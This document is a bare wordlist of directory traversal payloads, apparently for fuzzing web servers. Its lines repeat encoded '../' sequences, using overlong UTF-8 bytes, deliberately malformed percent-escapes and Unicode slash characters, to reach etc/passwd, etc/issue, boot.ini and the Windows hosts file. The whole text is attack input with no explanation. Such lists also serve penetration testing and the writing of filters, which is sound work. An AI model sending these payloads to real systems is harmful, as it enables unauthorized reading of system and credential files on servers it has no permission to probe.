-%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcboot.ini -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcetc%c1%pcpasswd -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcetc%c1%pcissue -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcboot.ini -%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pc%c0%ee%c0%ee%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%ee%c0%ee%c0%9vetc%c0%9vpasswd -%c0%ee%c0%ee%c0%9vetc%c0%9vissue -%c0%ee%c0%ee%c0%9vboot.ini -%c0%ee%c0%ee%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vetc%c0%9vpasswd -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vetc%c0%9vissue -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vboot.ini -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vetc%c0%9vpasswd -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vetc%c0%9vissue -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vboot.ini -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vetc%c0%9vpasswd -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vetc%c0%9vissue -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vboot.ini -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vetc%c0%9vpasswd -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vetc%c0%9vissue -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vboot.ini -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vetc%c0%9vpasswd -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vetc%c0%9vissue -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vboot.ini -%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9v%c0%ee%c0%ee%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%ee%c0%ee%c0%qfetc%c0%qfpasswd -%c0%ee%c0%ee%c0%qfetc%c0%qfissue -%c0%ee%c0%ee%c0%qfboot.ini -%c0%ee%c0%ee%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfetc%c0%qfpasswd -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfetc%c0%qfissue -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfboot.ini -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfetc%c0%qfpasswd -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfetc%c0%qfissue -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfboot.ini -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfetc%c0%qfpasswd -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfetc%c0%qfissue -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfboot.ini -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfetc%c0%qfpasswd -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfetc%c0%qfissue -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfboot.ini -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfetc%c0%qfpasswd -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfetc%c0%qfissue -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfboot.ini -%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qf%c0%ee%c0%ee%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%ee%c0%ee%c1%8setc%c1%8spasswd -%c0%ee%c0%ee%c1%8setc%c1%8sissue -%c0%ee%c0%ee%c1%8sboot.ini -%c0%ee%c0%ee%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8setc%c1%8spasswd -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8setc%c1%8sissue -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8sboot.ini -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8setc%c1%8spasswd -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8setc%c1%8sissue -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8sboot.ini -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8setc%c1%8spasswd -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8setc%c1%8sissue -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8sboot.ini -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8setc%c1%8spasswd -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8setc%c1%8sissue -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8sboot.ini -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8setc%c1%8spasswd -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8setc%c1%8sissue -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8sboot.ini -%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8s%c0%ee%c0%ee%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%ee%c0%ee%c1%1cetc%c1%1cpasswd -%c0%ee%c0%ee%c1%1cetc%c1%1cissue -%c0%ee%c0%ee%c1%1cboot.ini -%c0%ee%c0%ee%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cetc%c1%1cpasswd -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cetc%c1%1cissue -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cboot.ini -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cetc%c1%1cpasswd -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cetc%c1%1cissue -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cboot.ini -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cetc%c1%1cpasswd -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cetc%c1%1cissue -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cboot.ini -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cetc%c1%1cpasswd -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cetc%c1%1cissue -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cboot.ini -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cetc%c1%1cpasswd -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cetc%c1%1cissue -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cboot.ini -%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1c%c0%ee%c0%ee%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%ee%c0%ee%c1%afetc%c1%afpasswd -%c0%ee%c0%ee%c1%afetc%c1%afissue -%c0%ee%c0%ee%c1%afboot.ini -%c0%ee%c0%ee%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afetc%c1%afpasswd -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afetc%c1%afissue -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afboot.ini -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afetc%c1%afpasswd -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afetc%c1%afissue -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afboot.ini -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afetc%c1%afpasswd -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afetc%c1%afissue -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afboot.ini -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afetc%c1%afpasswd -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afetc%c1%afissue -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afboot.ini -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afetc%c1%afpasswd -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afetc%c1%afissue -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afboot.ini -%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%af%c0%ee%c0%ee%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%ee%c0%ee%bg%qfetc%bg%qfpasswd -%c0%ee%c0%ee%bg%qfetc%bg%qfissue -%c0%ee%c0%ee%bg%qfboot.ini -%c0%ee%c0%ee%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfetc%bg%qfpasswd -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfetc%bg%qfissue -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfboot.ini -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfetc%bg%qfpasswd -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfetc%bg%qfissue -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfboot.ini -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfetc%bg%qfpasswd -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfetc%bg%qfissue -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfboot.ini -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfetc%bg%qfpasswd -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfetc%bg%qfissue -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfboot.ini -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfetc%bg%qfpasswd -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfetc%bg%qfissue -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfboot.ini -%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qf%c0%ee%c0%ee%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%ee%c0%ee%u2215etc%u2215passwd -%c0%ee%c0%ee%u2215etc%u2215issue -%c0%ee%c0%ee%u2215boot.ini -%c0%ee%c0%ee%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215etc%u2215passwd -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215etc%u2215issue -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215boot.ini -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215etc%u2215passwd -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215etc%u2215issue -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215boot.ini -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215etc%u2215passwd -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215etc%u2215issue -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215boot.ini -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215etc%u2215passwd -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215etc%u2215issue -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215boot.ini -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215etc%u2215passwd -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215etc%u2215issue -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215boot.ini -%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215%c0%ee%c0%ee%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%ee%c0%ee%u2216etc%u2216passwd -%c0%ee%c0%ee%u2216etc%u2216issue -%c0%ee%c0%ee%u2216boot.ini -%c0%ee%c0%ee%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216etc%u2216passwd -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216etc%u2216issue -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216boot.ini -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216etc%u2216passwd -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216etc%u2216issue -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216boot.ini -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216etc%u2216passwd -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216etc%u2216issue -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216boot.ini -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216etc%u2216passwd -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216etc%u2216issue -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216boot.ini 